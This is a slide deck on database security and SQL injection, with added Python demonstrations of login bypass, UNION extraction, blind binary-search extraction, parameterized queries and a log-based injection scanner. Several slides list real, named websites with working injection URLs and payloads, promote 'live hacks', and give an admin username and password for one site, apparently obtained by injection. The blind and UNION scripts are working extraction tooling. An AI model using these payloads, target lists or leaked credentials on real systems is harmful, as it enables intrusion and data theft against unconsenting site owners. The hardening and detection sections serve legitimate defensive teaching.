DATABASE & DATABASE SECURITY
BY
REHAN MANZOOR
What actually is a database
 Code and filing concept
History of Database
Major Database Vendors
Interaction with Database
How we Interact (Direct Queries)
Custom defined functions
Stored Procedures
Integration with Languages
Static Apps
Dynamic Apps
Need in CMS
How We Integrate
 That is the real question: how do we integrate? Problems arise when the application is not attached to the database correctly. The code is what matters.
Contents continued..
 Database Attacks
 What is a Database Attack
 Explanation
 OWASP Rating (damage rate)
 Destruction of SQL injection
 History Reviews
 Recent bidding in underground
Database Attacks
 Excessive privileges
 Privilege abuse
 Unauthorized privilege elevation
 Platform vulnerabilities
 SQL injection
 Weak audit
 Denial of service
OWASP Top 10 vulnerabilities
Destruction of SQL Injection Attack
 Heartland Payment Systems
This New Jersey payment processing firm lost data on tens of millions of credit cards in an attack disclosed in 2009. Around 175,000 businesses were affected by the theft.
 TJX
More than 45 million people had their credit card details stolen, and some experts said the actual figure was likely to be closer to 94 million.
Recent Bidding in Underground
Login on Live Sites
 http://www.equinet.ch/fr/gestion/login.php
 1' OR '1'='1
 http://lionsclubofwashim.co.in/admin.php
 1' OR '1'='1
 admin.axilbusiness.in
 1' OR '1'='1
 http://www.anemos.in/admin/
 1' OR '1'='1
 Query code (C#, ASP.NET Web Forms; the text box values are concatenated straight into the SQL string)
"select username, password from admin where username='" + txtUserName.Text + "' and password='" + txtPassword.Text + "'"
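The bypass on this slide, as an added example that is not part of the deck: a Python/sqlite3 model of the concatenated login query beside the parameterized version. The in-memory admin table, its single row and the password S3cret! are constructed for the example; make_db, login_vulnerable and login_parameterized are names chosen here, not the deck's code.

```python
import sqlite3

# Constructed stand-in for the deck's "admin" table (assumed schema and credentials).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    conn.execute("INSERT INTO admin VALUES ('admin', 'S3cret!')")
    conn.commit()
    return conn

def build_vulnerable_sql(username, password):
    """The deck's query built by string concatenation: input text becomes SQL text."""
    return ("select username, password from admin where username='" + username
            + "' and password='" + password + "'")

def login_vulnerable(conn, username, password):
    """True when the concatenated query yields any row, i.e. the app treats it as a login."""
    return conn.execute(build_vulnerable_sql(username, password)).fetchone() is not None

def login_parameterized(conn, username, password):
    """Same query with bound parameters: the driver sends the values separately from
    the statement, so a quote in the input can never change the statement's structure."""
    sql = "select username, password from admin where username=? and password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None

if __name__ == "__main__":
    conn = make_db()
    payload = "1' OR '1'='1"
    print(build_vulnerable_sql(payload, payload))
    print("vulnerable login with payload:      ", login_vulnerable(conn, payload, payload))
    print("parameterized login with payload:   ", login_parameterized(conn, payload, payload))
    print("parameterized login with real creds:", login_parameterized(conn, "admin", "S3cret!"))
```

With 1' OR '1'='1 in both fields the concatenated statement reads where username='1' OR '1'='1' and password='1' OR '1'='1'. AND binds tighter than OR, so the trailing '1'='1' is true for every row and the first admin row comes back without any credential. The parameterized form hands the same text to the driver as a value; it is compared against the column, never parsed as SQL.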
Union based attack
 http://greenforce.com.pk/page.aspx?page_id=24+UNION+ALL+SELECT+null,null,@@version,null,null,null,null-- -
 http://www.philatourism.com/page.aspx?id=-3 UNION ALL SELECT table_name,null,null,null,null,null from information_schema.tables--
 http://www.sharan.org.uk/newsdetail.aspx?ID=-7 union all select '1',null--
 Code
"select * from tblName where id='" + Request.QueryString["id"] + "'"
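Added example (not from the deck) of the two steps behind the URLs above, in Python/sqlite3: find the column count with a growing list of nulls, then put an expression in a column the page displays. sqlite_version() stands in for @@version and sqlite_master for information_schema.tables; the pages and admin tables, their rows and the function names are assumptions made for this example.

```python
import sqlite3

# Constructed stand-in for a CMS database: a public "pages" table plus a private
# "admin" table the attacker wants to discover (assumed schema).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pages (id INTEGER, title TEXT, body TEXT);
        CREATE TABLE admin (username TEXT, password TEXT);
        INSERT INTO pages VALUES (24, 'About', 'Company profile');
        INSERT INTO admin VALUES ('admin', 'S3cret!');
    """)
    return conn

def page_vulnerable(conn, page_id):
    """The deck's concatenated page query; returns every row the page would render."""
    sql = "select * from pages where id='" + page_id + "'"
    return conn.execute(sql).fetchall()

def find_column_count(conn, max_cols=10):
    """Step 1: add NULL columns until the UNION stops erroring; that count is the
    number of columns in the original SELECT (the deck's null,null,... padding)."""
    for n in range(1, max_cols + 1):
        payload = "-1' UNION ALL SELECT " + ",".join(["null"] * n) + "-- -"
        try:
            page_vulnerable(conn, payload)
            return n
        except sqlite3.OperationalError:   # column count mismatch
            continue
    return None

def union_extract(conn, ncols, expression, from_clause=""):
    """Step 2: place an expression in a column the page displays (column 2, the
    title) and read it back. id -1 matches nothing, so only injected rows return."""
    cols = ["null"] * ncols
    cols[1] = expression
    payload = "-1' UNION ALL SELECT " + ",".join(cols) + " " + from_clause + "-- -"
    return [row[1] for row in page_vulnerable(conn, payload)]

def dump_version(conn, ncols):
    # sqlite_version() plays the role of @@version on SQL Server
    return union_extract(conn, ncols, "sqlite_version()")[0]

def dump_table_names(conn, ncols):
    # sqlite_master plays the role of information_schema.tables
    return sorted(union_extract(conn, ncols, "name", "FROM sqlite_master WHERE type='table'"))

def real_version():
    """Ground truth for comparing what the injection extracted."""
    return sqlite3.sqlite_version

if __name__ == "__main__":
    conn = make_db()
    n = find_column_count(conn)
    print("columns:", n)
    print("version:", dump_version(conn, n))
    print("tables: ", dump_table_names(conn, n))
```

The trailing -- - comments out the closing quote the application appends; the same trick appears in every URL on the slide.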
Error Based Attack
 http://www.vdjs.edu.in/CMS/ContentPage.aspx?id=21 and @@version>1-- -
 http://www.mission-education.org/resourcelist.cfm?audience_ID=5 and 1=convert(int,@@version)-- -&category_id=2
 http://www.grabbbit.com/Product.aspx?console_id=3' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='adminlogin' and column_name not in ('id','userid','password','admin_role_id')))--&type=Preown
 On SQL Server convert(int, ...) fails because the value is not numeric, and the conversion error echoes the value it could not convert, so each request leaks one string: the version first, then one column name at a time by growing the not in (...) list.
 http://www.grabbbit.com/admin/login.aspx
 userid admin
 password grabbbit$
 Code
"select column1, column2, column3 from table1 join table2 on table1.column1 = table2.column1 where id='" + Request.QueryString["id"] + "'"
Blind Attack
 fgcineplex.com.sg/Images/slideshow/sizzlingsoul.php
 Code
The query is the same as in the union case, but the page's labels are not populated from the query result (either they are stored separately in the database or the template never renders the selected columns), so UNION output never appears in the response. All that can be observed is whether the page behaves as for a true or a false condition, one bit per request.
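Added example (not part of the deck) of what is left when the page shows no query output: a true/false oracle and a binary search over character codes, in Python/sqlite3. The news and admin tables, the id 7 and the secret are constructed for the example; the BlindPage class stands in for the vulnerable page, and the printable-ASCII range is an assumption.

```python
import sqlite3

# Constructed stand-in: a "news" table the page reads and an "admin" table it never
# displays (assumed schema). The page only reveals whether a row was found.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news (id INTEGER, headline TEXT);
        CREATE TABLE admin (username TEXT, password TEXT);
        INSERT INTO news VALUES (7, 'Opening hours');
        INSERT INTO admin VALUES ('admin', 'S3cret!');
    """)
    return conn

class BlindPage:
    """Models the vulnerable page: same concatenated query as the UNION case, but the
    response carries no query output, only 'found' (True) or 'not found' (False)."""
    def __init__(self, conn):
        self.conn = conn
        self.requests = 0          # cost of the attack, counted per request

    def found(self, news_id):
        self.requests += 1
        sql = "select id from news where id='" + news_id + "'"
        return self.conn.execute(sql).fetchone() is not None

def extract_char(page, subquery, pos):
    """Binary-search one character's code point (printable ASCII assumed) using only
    yes/no answers; returns None once pos is past the end of the string."""
    if not page.found(f"7' AND length(({subquery}))>={pos}-- -"):
        return None
    lo, hi = 32, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if page.found(f"7' AND unicode(substr(({subquery}),{pos},1))>{mid}-- -"):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)

def extract_string(page, subquery, max_len=64):
    """Pull a whole value out, one character at a time, until the length check fails."""
    out = ""
    for pos in range(1, max_len + 1):
        ch = extract_char(page, subquery, pos)
        if ch is None:
            break
        out += ch
    return out

if __name__ == "__main__":
    page = BlindPage(make_db())
    secret = extract_string(page, "select password from admin limit 1")
    print(secret, "recovered in", page.requests, "requests")
```

Each character costs about seven requests, which is why blind injection is noisy in server logs even though no data ever appears in a response; the same loop works with a timing oracle when the page does not even differ between true and false.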
POST SQL Injection
 URL: http://haryanapolice.gov.in/police/pressreleases/search.asp
 POST body: text1=rummy'&text2=11/11/2010&SUBMIT=search
 Code
"select * from tablename where text1='" + Request.Form["text1"] + "' and text2='" + Request.Form["text2"] + "'"
Why SQL Injection Is Possible
 Who is responsible: the database or the programmer?
 Why not to blame the database
 The database is secure by nature; it executes exactly the statement it is given
 Lack of awareness
 No research-based study
 Lack of interest
 Non-professional coders
Detection of SQL Injection
 Manual Check
 Why
 How
 By Whom
 Automated Check
 Tools
 Scanners
Securing From SQL Injection
 Learn about it
 Firewalls
 By code:
 Disclose as few parameters as possible
 Give the session (application) database user the least possible rights
 Blacklisting evil keywords for the session user (a weak control on its own: keyword filters are bypassed with encoding, case changes and inline comments)
 User input validation
 Using prepared statements
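Added example (not the deck's code) putting three of the items above into one handler in Python/sqlite3: an allow-list check on the parameter, a bound parameter for the query, and a least-privilege session user. SQLite has no user accounts, so its authorizer hook stands in here for a database account granted SELECT on the public table only; the schema, the function names and the legacy code path are assumptions made for the example.

```python
import sqlite3

# Constructed CMS database (assumed schema): the public page needs "pages" only.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE admin (username TEXT, password TEXT);
        INSERT INTO pages VALUES (1, 'Home', 'Welcome');
        INSERT INTO admin VALUES ('admin', 'S3cret!');
    """)
    return conn

def restrict_to_read_only(conn, allowed_tables):
    """Least privilege for the session user. A real deployment grants SELECT on the
    public tables to a dedicated DB account; here SQLite's authorizer plays that
    account: reads of other tables and every write or DDL statement are denied."""
    def authorizer(action, table, column, db_name, trigger):
        if action in (sqlite3.SQLITE_SELECT, sqlite3.SQLITE_FUNCTION):
            return sqlite3.SQLITE_OK
        if action == sqlite3.SQLITE_READ:
            return sqlite3.SQLITE_OK if table in allowed_tables else sqlite3.SQLITE_DENY
        return sqlite3.SQLITE_DENY
    conn.set_authorizer(authorizer)

def is_valid_page_id(raw):
    """Allow-list validation: a page id is 1 to 9 ASCII digits and nothing else."""
    return isinstance(raw, str) and raw.isascii() and raw.isdigit() and 0 < len(raw) <= 9

def get_page(conn, raw_id):
    """Hardened handler: validate first, then bind the value as a parameter."""
    if not is_valid_page_id(raw_id):
        raise ValueError("invalid page id")
    return conn.execute("SELECT title, body FROM pages WHERE id=?", (int(raw_id),)).fetchone()

def legacy_page(conn, raw_id):
    """The deck's concatenated query left in an old code path. Still injectable, but
    the restricted account keeps the injected query away from the admin table."""
    try:
        return conn.execute("SELECT title, body FROM pages WHERE id='" + raw_id + "'").fetchall()
    except sqlite3.DatabaseError:      # 'not authorized' raised by the authorizer
        return None

if __name__ == "__main__":
    conn = make_db()
    restrict_to_read_only(conn, {"pages"})
    print(get_page(conn, "1"))
    print(legacy_page(conn, "-1' UNION ALL SELECT username, password FROM admin-- -"))
```

The layers are independent on purpose: validation rejects the injection before any SQL is built, the bound parameter makes the query safe even for input that passes validation, and the restricted account limits what an injection in code nobody reviewed can reach.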
More on Firewalls
 Use of a firewall
 As it is
 Customized
 Buffer overflows
 Null bytes
 Difference between a normal user and a hacker
Buffer Overflows
 Live example
 https://www.qmensolutions.com/remote_support_packs.php?packs=9%27--%20-
 The parameter decodes to 9'-- -: a quote to break out of the string literal, then a comment to discard the rest of the query.
 Bypassing keyword filters
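An added example (not part of the deck) that covers both the detection slide earlier and the keyword bypass here: a scanner in Python run over constructed access-log lines. It applies a plain keyword blacklist to the raw request and a set of signatures to a normalised copy (URL-decoded repeatedly, inline comments stripped, whitespace collapsed, case folded), so the evasions a blacklist misses show up side by side. The log lines, addresses and signature names are made up for the example; the packs=9%27--%20- request mirrors the slide's URL.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (Apache combined format, made up for this example).
# The first four carry injection attempts in the style of the deck's URLs; the last
# two are ordinary requests, one of which even contains the word "union".
ACCESS_LOG = """\
203.0.113.7 - - [11/Nov/2010:10:12:01 +0500] "GET /page.aspx?page_id=24+UNION+ALL+SELECT+null,null,@@version,null--+- HTTP/1.1" 200 5123
203.0.113.7 - - [11/Nov/2010:10:12:09 +0500] "GET /page.aspx?page_id=24%20UN/**/ION%20ALL%20SEL/**/ECT%20null,null,%40%40version,null--%20- HTTP/1.1" 200 5130
198.51.100.23 - - [11/Nov/2010:10:15:44 +0500] "GET /remote_support_packs.php?packs=9%27--%20- HTTP/1.1" 500 311
198.51.100.23 - - [11/Nov/2010:10:16:02 +0500] "GET /admin.php?user=1%2527%20OR%20%25271%2527%3D%25271&pass=x HTTP/1.1" 200 840
192.0.2.55 - - [11/Nov/2010:10:20:13 +0500] "GET /ContentPage.aspx?id=21 HTTP/1.1" 200 7021
192.0.2.55 - - [11/Nov/2010:10:20:30 +0500] "GET /search.asp?q=union+of+india HTTP/1.1" 200 2210
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# What a keyword blacklist (the deck's "blacklisting evil keywords") looks for,
# applied to the raw request the way many simple filters do.
BLACKLIST = ["union select", "union all select", "' or '1'='1", "information_schema", "@@version"]

# Signatures applied after normalisation, so encoding tricks do not hide them.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b"),
    "tautology": re.compile(r"'\s*or\s*'[^']*'\s*=\s*'"),
    "quote_then_comment": re.compile(r"'\s*(?:--|#|/\*)"),
    "version_probe": re.compile(r"@@version|\bversion\s*\("),
    "schema_probe": re.compile(r"information_schema\.|\bsqlite_master\b"),
    "error_based_cast": re.compile(r"\bconvert\s*\(\s*int\b"),
}

def normalize(request):
    """Undo the evasions: repeated URL decoding (double encoding), '+' to space,
    inline comments removed (UN/**/ION -> UNION), whitespace collapsed, lower case."""
    decoded = request
    while True:
        step = unquote_plus(decoded)
        if step == decoded:
            break
        decoded = step
    decoded = re.sub(r"/\*.*?\*/", "", decoded)
    return re.sub(r"\s+", " ", decoded).lower()

def scan_log(log_text):
    """One dict per request: blacklist words that hit on the raw request, and
    signatures that hit on the normalised request."""
    results = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        raw = m.group(1)
        norm = normalize(raw)
        results.append({
            "request": raw,
            "blacklist": [w for w in BLACKLIST if w in raw.lower()],
            "signatures": [name for name, rx in SIGNATURES.items() if rx.search(norm)],
        })
    return results

if __name__ == "__main__":
    for r in scan_log(ACCESS_LOG):
        print(f"blacklist={r['blacklist']!s:<14} signatures={r['signatures']}  {r['request']}")
```

On these six lines the raw blacklist flags only the first request (it happens to contain @@version verbatim); comment-split keywords, percent-encoded @@, the bare 9'-- - probe and the double-encoded tautology all pass it. The normalised signatures flag all four attacks and neither benign request, including the one whose search term contains "union". POST bodies are not in an access log at all, which is the caveat for the deck's POST injection slide: detecting those needs the application or a WAF to log the body.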
Live Hack Of A Website
 http://aquaservices.co.in/
Conclusion
 Although databases and their contents are vulnerable to a host of internal and external threats, it is possible to reduce the attack vectors to near zero. By addressing these threats you will meet the requirements of the most regulated industries in the world.
